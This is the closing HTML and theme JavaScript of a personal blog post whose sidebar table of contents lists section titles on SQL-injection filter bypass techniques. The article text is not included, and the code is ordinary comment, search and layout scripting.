    id: 'Sun Mar 07 2021 09:20:14 GMT+0800', // Ensure uniqueness and length less than 50
    distractionFreeMode: false, // Facebook-like distraction free mode
    perPage: 10 ,
    pagerDirection: 'last',
    createIssueManually: false ,
    language: 'zh-CN'
  });
  gitalk.render('gitalk-container');

  var gtFolded = () => {
    setTimeout(function() {
      let markdownBody = document.getElementsByClassName("markdown-body");
      let list = Array.from(markdownBody);
      list.forEach(item => {
        if (item.clientHeight > 250) {
          item.classList.add('gt-comment-body-folded');
          item.style.maxHeight = '250px';
          item.title = 'Click to Expand';
          item.onclick = function() {
            item.classList.remove('gt-comment-body-folded');
            item.style.maxHeight = '';
            item.title = '';
            item.onclick = null;
          };
        }
      })
    }, 800);
  }
</script>

<!-- gitalk end -->



<!-- 2. gitment comment -->



<!-- 3. disqus comment -->


        <!-- comments end -->
        <hr>

      </div>

      <!-- Catalog: Tabe of Content -->
      <!-- Table of Contents -->

    
      <aside id="sidebar">
        <div id="toc" class="toc-article">
        <strong class="toc-title">Contents</strong>
        
          <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#普通绕过策略"><span class="toc-nav-number">1.</span> <span class="toc-nav-text">普通绕过策略</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#利用符号替代"><span class="toc-nav-number">1.1.</span> <span class="toc-nav-text">利用符号替代</span></a></li></ol></li></ol></li></ol></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#SQL注入一些过滤及绕过总结"><span class="toc-nav-number"></span> <span class="toc-nav-text">SQL注入一些过滤及绕过总结</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#SQL注入绕过技巧"><span class="toc-nav-number"></span> <span class="toc-nav-text">SQL注入绕过技巧</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#1-绕过空格（注释符-，-a0）："><span class="toc-nav-number"></span> <span class="toc-nav-text">1.绕过空格（注释符&#x2F;* *&#x2F;，%a0）：</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#2-括号绕过空格："><span class="toc-nav-number"></span> <span class="toc-nav-text">2.括号绕过空格：</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#3-引号绕过（使用十六进制）："><span class="toc-nav-number"></span> <span class="toc-nav-text">3.引号绕过（使用十六进制）：</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#4-逗号绕过（limit使用from或者offset）（substr使用from-for属于逗号）："><span class="toc-nav-number"></span> <span class="toc-nav-text">4.逗号绕过（limit使用from或者offset）（substr使用from for属于逗号）：</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#5-比较符号（-lt-gt-）绕过（使用greatest-）："><span class="toc-nav-number"></span> <span class="toc-nav-text">5.比较符号（&lt;&gt;）绕过（使用greatest()）：</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#6-or-and-绕过："><span class="toc-nav-number"></span> <span class="toc-nav-text">6.or and 绕过：</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#7-绕过注释符号（-，–）过滤："><span class="toc-nav-number"></span> <span class="toc-nav-text">7.绕过注释符号（#，–）过滤：</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#8-绕过："><span class="toc-nav-number"></span> <span class="toc-nav-text">8.&#x3D;绕过：</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#9-绕过union，select，where等："><span class="toc-nav-number"></span> <span class="toc-nav-text">9.绕过union，select，where等：</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#（1）使用注释符绕过："><span class="toc-nav-number"></span> <span class="toc-nav-text">（1）使用注释符绕过：</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#（2）使用大小写绕过："><span class="toc-nav-number"></span> <span class="toc-nav-text">（2）使用大小写绕过：</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#（3）内联注释绕过："><span class="toc-nav-number"></span> <span class="toc-nav-text">（3）内联注释绕过：</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#（4）-双关键字绕过："><span class="toc-nav-number"></span> <span class="toc-nav-text">（4） 双关键字绕过：</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#10-通用绕过（编码）："><span class="toc-nav-number"></span> <span class="toc-nav-text">10.通用绕过（编码）：</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#11-等价函数绕过："><span class="toc-nav-number"></span> <span class="toc-nav-text">11.等价函数绕过：</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#12-宽字节注入："><span class="toc-nav-number"></span> <span class="toc-nav-text">12.宽字节注入：</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#过滤-2"><span class="toc-nav-number"></span> <span class="toc-nav-text">过滤*2</span></a>
        
        </div>
      </aside>
    


      <!-- Sidebar Container -->
      <div class="
                col-lg-8 col-lg-offset-1
                col-md-10 col-md-offset-1
                sidebar-container">

        <!-- Featured Tags -->
        
        <section>
          <!-- no hr -->
          <h5>
            <a href="/tags/">FEATURED TAGS</a>
          </h5>
          <div class="tags">
            
            <a class="tag" href="/tags/#WEB" title="WEB">WEB</a>
            
            <a class="tag" href="/tags/#SQL" title="SQL">SQL</a>
            
          </div>
        </section>
        

        <!-- Friends Blog -->
        
        <hr>
        <h5>FRIENDS</h5>
        <ul class="list-inline">

          
          <li>
            <a href="http://poilzero.sipc115.club/" target="_blank">poilzero</a>
          </li>
          
          <li>
            <a href="https://www.515code.com/" target="_blank">铭大佬</a>
          </li>
          
          <li>
            <a href="http://www.xcy1010.cn/" target="_blank">徐晨阳</a>
          </li>
          
          <li>
            <a href="http://derait.sipc115.club/" target="_blank">陈泓盛</a>
          </li>
          
        </ul>
        
      </div>
    </div>
  </div>
</article>



<!-- anchorjs start -->
<!-- async load function -->
<!-- anchor-js, Doc:http://bryanbraun.github.io/anchorjs/ -->
<script type="text/javascript">
  // async load function
  function async (u, c) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) {
      o.addEventListener('load', function(e) {
        c(null, e);
      }, false);
    }
    s.parentNode.insertBefore(o, s);
  };
</script>
<script type="text/javascript">
  //anchor-js, Doc:http://bryanbraun.github.io/anchorjs/
  async ("https://cdn.bootcss.com/anchor-js/1.1.1/anchor.min.js", function() {
    anchors.options = {
      visible: 'hover',
      placement: 'left',
      // icon: 'ℬ'
      icon: '❡'
    };
    anchors.add().remove('.intro-header h1').remove('.subheading').remove('.sidebar-container h5');
  });
</script>
<style>
  /* place left on bigger screen */
  @media all and (min-width: 800px) {
    .anchorjs-link {
      position: absolute;
      left: -0.75em;
      font-size: 1.1em;
      margin-top: -0.1em;
    }
  }
</style>

<!-- anchorjs end -->



	<!-- Footer (contains ThemeColor、viewer) -->
	<!-- Footer -->
<footer>
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center">
          

          
            <li>
              <a target="_blank" href="https://github.com/urdr-gungnir">
                <span class="fa-stack fa-lg">
                  <i class="fa fa-circle fa-stack-2x"></i>
                  <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                </span>
              </a>
            </li>
          

          
            <li>
              <a target="_blank" href="https://twitter.com/九日">
                <span class="fa-stack fa-lg">
                  <i class="fa fa-circle fa-stack-2x"></i>
                  <i class="fa fa-twitter fa-stack-1x fa-inverse"></i>
                </span>
              </a>
            </li>
          

          

          
            <li>
              <a target="_blank" href="https://www.facebook.com/gungnir">
                <span class="fa-stack fa-lg">
                  <i class="fa fa-circle fa-stack-2x"></i>
                  <i class="fa fa-facebook fa-stack-1x fa-inverse"></i>
                </span>
              </a>
            </li>
          

          

          
            <li>
              <a target="_blank" href="https://www.zhihu.com/people/九日">
                <span class="fa-stack fa-lg">
                  <i class="fa fa-circle fa-stack-2x"></i>
                  <i class="fa  fa-stack-1x fa-inverse">知</i>
                </span>
              </a>
            </li>
          

          

        </ul>
        <p class="copyright text-muted">
          Copyright &copy;
          gungnir
          2021
          <br>
          Theme by
          <a href="http://beantech.org" target="_blank" rel="noopener">BeanTech</a>
          <span style="display: inline-block; margin: 0 5px;">
            <i class="fa fa-heart"></i>
          </span>
          re-Ported by
          <a href="https://v-vincen.life/" target="_blank" rel="noopener">Live My Life</a>
          |
          <iframe style="margin-left: 2px; margin-bottom:-5px;" frameborder="0" scrolling="0" width="91px" height="20px" src="https://ghbtns.com/github-btn.html?user=V-Vincen&repo=V-Vincen.github.io&type=star&count=true"></iframe>
        </p>
      </div>
    </div>
  </div>
</footer>

<a id="rocket" href="#top" class=""></a>

<!-- jQuery -->
<script type="text/javascript" src="/js/jquery.min.js"></script>
<!-- <script type="text/javascript" src="/js/jquery.js"></script> -->
<!-- <script type="text/javascript" src="//cdnjs.loli.net/ajax/libs/jquery/3.2.1/jquery.min.js"></script> -->

<!-- Bootstrap Core JavaScript -->
<script type="text/javascript" src="/js/bootstrap.min.js"></script>

<!-- Custom Theme JavaScript -->
<script type="text/javascript" src="/js/hux-blog.min.js"></script>

<!-- catalog -->
<script type="text/javascript" async="true" src="/js/catalog.js?v=1.0.0"></script>

<!-- totop(rocket) -->
<script type="text/javascript" async="true" src="/js/totop.js?v=1.0.0"></script>

<!-- Busuanzi JavaScript -->

  <!-- <script type="text/javascript" async="true" src="/js/busuanzi.pure.mini.js"></script> -->
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



  <!-- Scroll start -->
  <script type="text/javascript" src="/js/scroll.js"></script>
  <!-- Scroll end -->



  <!-- ThemeColor start -->
  <script type="text/javascript" src="/js/themecolor.js"></script>
  <!-- ThemeColor end -->



  <!-- CDN: jsdelivr start -->
  <script type="text/javascript">
    let imgsUrl = document.getElementsByTagName("img");
    let imgUrl = Array.from(imgsUrl);

    let jsdelivr = "https://cdn.jsdelivr.net/gh/";
    let gh = "urdr-gungnir";
    let ghPages = gh + ".github.io";
    let pagePath = "2021/03/07/SQL的各种绕过/";
    let jsdelivrurl;
    if (pagePath.indexOf("index.html") != -1) {
      jsdelivrurl = jsdelivr + gh + "/" + ghPages;
    }else{
      jsdelivrurl = jsdelivr + gh + "/" + ghPages + "/" + pagePath;
    }
    imgUrl.forEach(item => {
      let oldUrl = item.getAttribute("src");
      let newUrl = oldUrl.replace(oldUrl, jsdelivrurl + oldUrl).replace("..","");
      item.setAttribute("src", newUrl);
    });
  </script>
  <!-- CDN: jsdelivr end -->



  <!-- viewer start -->
  <!-- viewer start (Picture preview) -->
  <script type="text/javascript" src="/js/viewer/viewer.min.js"></script>
  <script type="text/javascript" src="/js/viewer/pic-viewer.js"></script>
  <!-- viewer end -->


<script>
  // async load function
  function async (u, c) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) {
      o.addEventListener('load', function (e) {
        c(null, e);
      }, false);
    }
    s.parentNode.insertBefore(o, s);
  }

  // fastClick.js
  async ("https://cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function () {
    var $nav = document.querySelector("nav");
    if ($nav)
      FastClick.attach($nav);
    }
  )
</script>

<!-- Because of the native support for backtick-style fenced code blocks right within the Markdown is landed in Github Pages, From V1.6, There is no need for Highlight.js, so Huxblog drops it officially. -
https://github.com/blog/2100-github-pages-now-faster-and-simpler-with-jekyll-3-0 - https://help.github.com/articles/creating-and-highlighting-code-blocks/ -->
<!-- <script> async("http://cdn.bootcss.com/highlight.js/8.6/highlight.min.js", function(){ hljs.initHighlightingOnLoad(); }) </script> <link href="http://cdn.bootcss.com/highlight.js/8.6/styles/github.min.css" rel="stylesheet"> -->

<!-- jquery.tagcloud.js -->
<!-- <script> // only load tagcloud.js in tag.html if($('#tag_cloud').length !== 0){ async("http://yoursite-url/js/jquery.tagcloud.js",function(){ $.fn.tagcloud.defaults = { //size: {start: 1, end: 1, unit: 'em'}, color: {start:
'#bbbbee', end: '#0085a1'}, }; $('#tag_cloud a').tagcloud(); }) } </script> -->


	<!-- Search -->
	
	<div class="popup search-popup local-search-popup">
  <span class="popup-btn-close">
    ESC
  </span>
  <div class="container">
    <div class="row">
      <!-- <div class="col-md-9 col-md-offset-1"> -->
      <div class="col-lg-9 col-lg-offset-1 col-md-10 col-md-offset-1 local-search-content">

        <div class="local-search-header clearfix">

          <div class="local-search-input-wrapper">
            <span class="search-icon">
              <i class="fa fa-search fa-lg" style="margin: 25px 10px 25px 20px;"></i>
            </span>
            <input autocomplete="off" placeholder="Search..." type="text" id="local-search-input">
          </div>
        </div>
        <div id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>


  <script src="/js/ziploader.js"></script>
  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.json";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    // monitor main search box;
    var onPopupClose = function (e) {
      $('.popup').fadeOut(300);
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $('.popup').fadeIn(300);
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }
    // get search zip version
    $.get('/searchVersion.json?t=' + (+new Date()), function (res) {
      if (localStorage.getItem('searchVersion') !== res) {
        localStorage.setItem('searchVersion', res);
        initSearchJson();
      }
    });

    function initSearchJson() {
      initLoad(['/search.flv'], {
        loadOptions: {
          success: function (obj) {
            localStorage.setItem('searchJson', obj['search.json'])
          },
          error: function (e) {
            return console.log(e)
          }
        },
        returnOptions: {
          'json': TYPE_TEXT
        },
        mimeOptions: {
          'json': 'application/json'
        }
      })
    }
    // search function;
    var searchFunc = function (search_id, content_id) {
      'use strict';
      isfetched = true;
      var datas = JSON.parse(localStorage.getItem('searchJson'));
      // console.log(search_id)
      var input = document.getElementById(search_id);
      var resultContent = document.getElementById(content_id);
      var inputEventFunction = function () {
        var searchText = input.value.trim().toLowerCase();
        var keywords = searchText.split(/[\s\-]+/);
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        var resultItems = [];
        if (searchText.length > 0) {
          // perform local searching
          datas.forEach(function (data) {
            var isMatch = false;
            var hitCount = 0;
            var searchTextCount = 0;
            var title = data.title
              ? data.title.trim()
              : '';
            var titleInLowerCase = title.toLowerCase();
            var content = data.content
              ? data.content.trim().replace(/<[^>]+>/g, "")
              : '';
            var contentInLowerCase = content.toLowerCase();
            var articleUrl = decodeURIComponent(data.url);

            var date = data.date;
            var dateTime = date.replace(/T/, " ").replace(/.000Z/, "");
            var imgUrl = data.header_img;

            var indexOfTitle = [];
            var indexOfContent = [];
            // only match articles with not empty titles
            keywords.forEach(function (keyword) {
              function getIndexByWord(word, text, caseSensitive) {
                var wordLen = word.length;
                if (wordLen === 0) {
                  return [];
                }
                var startPosition = 0,
                  position = [],
                  index = [];
                if (!caseSensitive) {
                  text = text.toLowerCase();
                  word = word.toLowerCase();
                }
                while ((position = text.indexOf(word, startPosition)) > -1) {
                  index.push({position: position, word: word});
                  startPosition = position + wordLen;
                }
                return index;
              }
              indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
              indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
            });
            if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
              isMatch = true;
              hitCount = indexOfTitle.length + indexOfContent.length;
            }
            // show search results
            if (isMatch) {
              // sort index by position of keyword
              [indexOfTitle, indexOfContent].forEach(function (index) {
                index.sort(function (itemLeft, itemRight) {
                  if (itemRight.position !== itemLeft.position) {
                    return itemRight.position - itemLeft.position;
                  } else {
                    return itemLeft.word.length - itemRight.word.length;
                  }
                });
              });
              // merge hits into slices
              function mergeIntoSlice(text, start, end, index) {
                var item = index[index.length - 1];
                var position = item.position;
                var word = item.word;
                var hits = [];
                var searchTextCountInSlice = 0;
                while (position + word.length <= end && index.length != 0) {
                  if (word === searchText) {
                    searchTextCountInSlice++;
                  }
                  hits.push({position: position, length: word.length});
                  var wordEnd = position + word.length;
                  // move to next position of hit
                  index.pop();
                  while (index.length != 0) {
                    item = index[index.length - 1];
                    position = item.position;
                    word = item.word;
                    if (wordEnd > position) {
                      index.pop();
                    } else {
                      break;
                    }
                  }
                }
                searchTextCount += searchTextCountInSlice;
                return {hits: hits, start: start, end: end, searchTextCount: searchTextCountInSlice};
              }
              var slicesOfTitle = [];
              if (indexOfTitle.length != 0) {
                slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
              }
              var slicesOfContent = [];
              while (indexOfContent.length != 0) {
                var item = indexOfContent[indexOfContent.length - 1];
                var position = item.position;
                var word = item.word;
                // cut out 100 characters
                var start = position - 20;
                var end = position + 80;
                if (start < 0) {
                  start = 0;
                }
                if (end < position + word.length) {
                  end = position + word.length;
                }
                if (end > content.length) {
                  end = content.length;
                }
                slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
              }
              // sort slices in content by search text's count and hits' count
              slicesOfContent.sort(function (sliceLeft, sliceRight) {
                if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                  return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                  return sliceRight.hits.length - sliceLeft.hits.length;
                } else {
                  return sliceLeft.start - sliceRight.start;
                }
              });
              // select top N slices in content
              var upperBound = parseInt('1');
              if (upperBound >= 0) {
                slicesOfContent = slicesOfContent.slice(0, upperBound);
              }
              // highlight title and content
              function highlightKeyword(text, slice) {
                var result = '';
                var prevEnd = slice.start;
                slice.hits.forEach(function (hit) {
                  result += text.substring(prevEnd, hit.position);
                  var end = hit.position + hit.length;
                  result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                  prevEnd = end;
                });
                result += text.substring(prevEnd, slice.end);
                return result;
              }
              var resultItem = '';

              // if (slicesOfTitle.length != 0) {   resultItem += "<li><a target='_blank' href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>"; } else {   resultItem += "<li><a target='_blank' href='" +
              // articleUrl + "' class='search-result-title'>" + title + "</a>"; } slicesOfContent.forEach(function (slice) {   resultItem += "<a target='_blank' href='" + articleUrl + "'><p class=\"search-result\">" + highlightKeyword(content, slice) +
              // "...</p></a>"; }); resultItem += "</li>";

              if (slicesOfTitle.length != 0) {
                resultItem += "<a target='_blank' href='" + articleUrl + "' class='search-result'><div class='search-result-left'><div class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</div><time class='search-result-date'>" + dateTime + "</time>";
              } else {
                resultItem += "<a target='_blank' href='" + articleUrl + "' class='search-result'><div class='search-result-left'><div class='search-result-title'>" + title + "</div><time class='search-result-date'>" + dateTime + "</time>";
              }
              slicesOfContent.forEach(function (slice) {
                resultItem += "<p class=\"search-result-content\">" + highlightKeyword(content, slice) + "...</p>";
              });
              resultItem += "</div><div class='search-result-right'><img class='media-image' src='" + imgUrl + "' width='64px' height='48px'></img></div></a>";

              resultItems.push({item: resultItem, searchTextCount: searchTextCount, hitCount: hitCount, id: resultItems.length});
            }
          })
        };

        if (keywords.length === 1 && keywords[0] === "") {
          resultContent.innerHTML = '<div id="no-result"></div>'
        } else if (resultItems.length === 0) {
          resultContent.innerHTML = '<div id="no-result"></div>'
        } else {
          resultItems.sort(function (resultLeft, resultRight) {
            if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
              return resultRight.searchTextCount - resultLeft.searchTextCount;
            } else if (resultLeft.hitCount !== resultRight.hitCount) {
              return resultRight.hitCount - resultLeft.hitCount;
            } else {
              return resultRight.id - resultLeft.id;
            }
          });
          var searchResultList = '<div class=\"search-result-list\">';
          resultItems.forEach(function (result) {
            searchResultList += result.item;
          })
          searchResultList += "</div>";
          resultContent.innerHTML = searchResultList;
        }
      }
      if ('auto' === 'auto') {
        input.addEventListener('input', inputEventFunction);
      } else {
        $('.search-icon').click(inputEventFunction);
        input.addEventListener('keypress', function (event) {
          if (event.keyCode === 13) {
            inputEventFunction();
          }
        });
      }
      // remove loading animation
      $('body').css('overflow', '');
      proceedsearch();
    }
    // handle and trigger popup window;
    $('.popup-trigger').click(function (e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc('local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });
    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function (e) {
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 && $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });

    document.addEventListener('mouseup', (e) => {
      var _con = document.querySelector(".local-search-content");
      if (_con) {
        if (!_con.contains(e.target)) {
          onPopupClose();
        }
      }
    });
  </script>


	

	<!-- Image to hack wechat -->
	<!-- <img src="http://yoursite-url/img/icon_wechat.png" width="0" height="0" /> -->
	<!-- Migrate from head to bottom, no longer block render and still work -->

</body>

</html>
